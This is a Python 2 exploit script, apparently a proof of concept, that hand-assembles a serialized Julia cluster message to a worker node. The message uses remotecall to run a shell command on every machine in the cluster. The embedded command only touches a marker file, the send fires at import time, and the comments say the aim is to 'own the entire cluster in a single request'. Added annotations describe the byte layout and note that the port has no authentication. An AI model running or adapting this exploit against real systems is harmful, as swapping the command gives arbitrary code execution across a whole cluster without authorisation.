import socket
import time
import struct
from random import randint
# Destination of send_payload(): the single node that receives the serialized
# message. Per the comments further down, that one request is meant to reach the
# rest of the cluster through the message contents, not through further
# connections from this script.
TCP_IP = "172.16.195.169"
TCP_PORT = 9009
def send_payload(packet):
    """Open a TCP connection to (TCP_IP, TCP_PORT), send *packet* once and close.

    ``packet`` is the fully serialized message. The helpers in this file build
    it by concatenating ``chr()`` results with ``struct.pack()`` output, which
    only type-checks on Python 2 (``str`` is a byte string there); this file is
    Python 2 code.

    No reply is read. The socket is not wrapped in ``try``/``finally``, so an
    exception from connect() or send() leaks the descriptor, and the return
    value of send() (bytes actually written) is not checked.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TCP_IP, TCP_PORT))
    s.send(packet)
    # Keep the connection open briefly before tearing it down; nothing is
    # received during the pause.
    time.sleep(1)
    s.close()
def encode_length(l):
    """Encode the integer *l* in the compact length form used by the messages below.

    Values up to 32 become a single byte ``chr(l + 126)`` (126..158).
    Larger values are the tag byte ``\\x09`` followed by *l* as an 8-byte
    little-endian unsigned integer.

    Python 2 only: on Python 3 the second branch concatenates ``str`` with
    ``bytes`` and raises TypeError. No check is made for negative *l*.
    NOTE(review): this looks like the small-int encoding of Julia's Serializer
    (the strings in this file name Julia types) — inferred, not confirmed.
    """
    if l <= 32:
        return chr(l + 126)
    else:
        return "\x09" + struct.pack("<Q", l)
def serialize_command(parts):
    """Serialize a command given as a list of argument strings (e.g. ``["touch", path]``).

    Layout produced (everything is a Python 2 ``str``):

    * ``\\x16``, a count byte ``chr(len(parts) + 1)`` and the literal
      ``=1\\x1f\\x02\\x05tuple`` — a header naming ``tuple``;
    * for each element of *parts*: the fixed prefix
      ``\\x16\\x02=1\\x1f\\x02\\x05tuple&\\x15``, the element's length via
      encode_length(), then the element's raw bytes.

    The embedded names (tuple, and GlobalRef/remotecall/procs/run/cmd_gen in
    the parts below) suggest Julia's built-in Serializer wire format; that is
    inferred from the strings, not confirmed here. The count byte is
    ``chr(len(parts) + 1)``, so more than 254 arguments would make chr() raise.
    """
    data = "\x16"
    data += chr(len(parts) + 1)
    data += "=1\x1f\x02\x05tuple"
    for part in parts:
        data += "\x16\x02=1\x1f\x02\x05tuple&\x15"
        data += encode_length(len(part))
        data += part
    return data
# Creates an empty file at /tmp/full_cluster_compromise_confirmed on every computer in the cluster (including the master)
command = ["touch", "/tmp/full_cluster_compromise_confirmed"]
# Build the payload to own the entire cluster in a single request to one node
#
# What the four parts visibly contain (the binary framing is not decoded here;
# the recognizable names are Julia identifiers, so this appears to be Julia's
# Serializer format — inferred from the strings, not confirmed):
#   part_0: a "CallMsg" header, then the current Unix time as a big-endian
#           32-bit int.
#   part_1: a "GlobalRef ... remotecall" reference plus another timestamp.
#   part_2: references to procs, length, start, next, indexed_next, getfield,
#           several GenSym placeholders, a second remotecall, and a timestamp.
#   part_3: "GlobalRef ... run", "getfield ... cmd_gen", the serialized
#           command from serialize_command(command), setindex!/pop references,
#           and a trailing encode_length(int(time.time())).
# int(time.time()) is evaluated separately for each part at module load, so
# the timestamps can differ by a second across parts, and the bytes change on
# every run. Because the trailing value is far larger than 32, that final
# encode_length() call always produces the "\x09" + 8-byte form.
# Defensive note (inferred): nothing in this client performs any
# authentication step before the message is sent, so reachability of
# TCP_IP:TCP_PORT is the only barrier; limiting network exposure of that port
# and alerting on unexpected inbound connections to it are the natural
# mitigations.
part_0 = '\x11\x01\x02\x07CallMsg#t/+\x01\x00\x00\x00=\x13\x01"\n' + struct.pack(">I", int(time.time()))
part_1 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1U2\x151\x82\x151\x7f\x151\x81U2~\x151~\x86\x151~\x16\x02;1\x1a\x02\x04none\x7f\x16\x01<1\x16\x04=1\x11\x01\x02\tGlobalRef#s/#/\x02\nremotecall\x7f"\n' + struct.pack(">I", int(time.time()))
part_2 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1c2\x151\x82\x151\x84\x151\x81c2~\x151\x81\x02\x04#s242\x80\x151\x81\x02\x04#s232\x80\x151\x81\x02\x04#s222\x80\x151\x81d2\x90\x151\x81\x02\x03#s12\x80\x151~\x86\x151~\x16\x1e;1\x1a\x02\x04none\x7f\x16\x02?1\x11\x01\x02\x06GenSym#s/~\x16\x01=1\x11\x01\x02\tGlobalRef#s/#/\x02\x05procs\x16\x02?1\x11\x01\x02\x06GenSym#s/\x7f\x16\x02=1\x1f\x02\x06length\x11\x01\x02\x06GenSym#s/~\x1c~\x16\x02?1\x11\x01\x02\x06GenSym#s/\x81\x16\x03=1\x1f7\x16\x01\x02\rstatic_typeof1\x11\x01\x02\x06GenSym#s/\x82\x11\x01\x02\x06GenSym#s/\x7f\x16\x02?1\x02\x04#s24\x7f\x16\x02?1\x02\x04#s23\x16\x02=1\x1f\x02\x05start\x11\x01\x02\x06GenSym#s/~\x16\x02?1\x02\x04#s22~\x16\x02A1\x16\x03=1\x1f\x02\x02!=\x02\x04#s22\x11\x01\x02\x06GenSym#s/\x7f\x80\x1c\x81\x16\x02?1\x02\x04#s22\x16\x03=1\x1f\x02\x01+\x02\x04#s22\x7f\x16\x02?1\x11\x01\x02\x06GenSym#s/\x83\x16\x03=1\x1f\x02\x04next\x11\x01\x02\x06GenSym#s/~\x02\x04#s23\x16\x02?1\x02\x03#s1\x16\x02=1\x1f\x02\x05start\x11\x01\x02\x06GenSym#s/\x83\x16\x02?1\x11\x01\x02\x06GenSym#s/\x84\x16\x04=1\x1f\x02\x0cindexed_next\x11\x01\x02\x06GenSym#s/\x83\x7f\x02\x03#s1\x16\x02?1d\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x84\x7f\x16\x02?1\x02\x03#s1\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x84\x80\x16\x02?1\x11\x01\x02\x06GenSym#s/\x85\x16\x04=1\x1f\x02\x0cindexed_next\x11\x01\x02\x06GenSym#s/\x83\x80\x02\x03#s1\x16\x02?1\x02\x04#s23\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x85\x7f\x16\x02?1\x02\x03#s1\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x85\x80\x16\x02?1\x11\x01\x02\x06GenSym#s/\x82\x16\x04=1\x11\x01\x02\tGlobalRef#s/#/\x02\nremotecalld"\n' + struct.pack(">I", int(time.time()))
part_3 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1b2\x151\x82\x151\x7f\x151\x81b2~\x151~~\x151~\x16\x02;1\x1a\x02\x04none\x7f\x16\x01<1\x16\x02=1\x11\x01\x02\tGlobalRef#s/#/\x02\x03run\x16\x02=1\x16\x03=1\x1f\x02\x08getfield#t/\x1e\x02\x07cmd_gen' + serialize_command(command) + '\x151~+\x00\x00\x00\x00{#/}\x16\x01=1\x1f\x02\x05tuple\x16\x02\x02\ttype_goto1~\x11\x01\x02\x06GenSym#s/\x82\x16\x01\x02\x0bboundscheck1{\x16\x04=1\x1f\x02\tsetindex!\x11\x01\x02\x06GenSym#s/\x81\x11\x01\x02\x06GenSym#s/\x82\x02\x04#s24\x16\x01\x02\x0bboundscheck1\x11\x01\x02\tGlobalRef#s/#/\x02\x03pop\x16\x02?1\x02\x04#s24\x16\x03=1\x1f\x02\x01+\x02\x04#s24\x7f\x1c\x82\x16\x02A1\x16\x02=1\x1f\x02\x01!\x16\x03=1\x1f\x02\x02!=\x02\x04#s22\x11\x01\x02\x06GenSym#s/\x7f\x81\x1c\x80\x1c\x7f\x16\x01<1\x11\x01\x02\x06GenSym#s/\x81\x151~+\x00\x00\x00\x00{#/}\x16\x01=1\x1f\x02\x05tuple\x151~+\x00\x00\x00\x00{#/}+\x00\x00\x00\x00\x14\x01/\x14\x02\x7f' + encode_length(int(time.time()))
# Runs at import time: the four parts are concatenated and sent as one message.
send_payload(part_0 + part_1 + part_2 + part_3)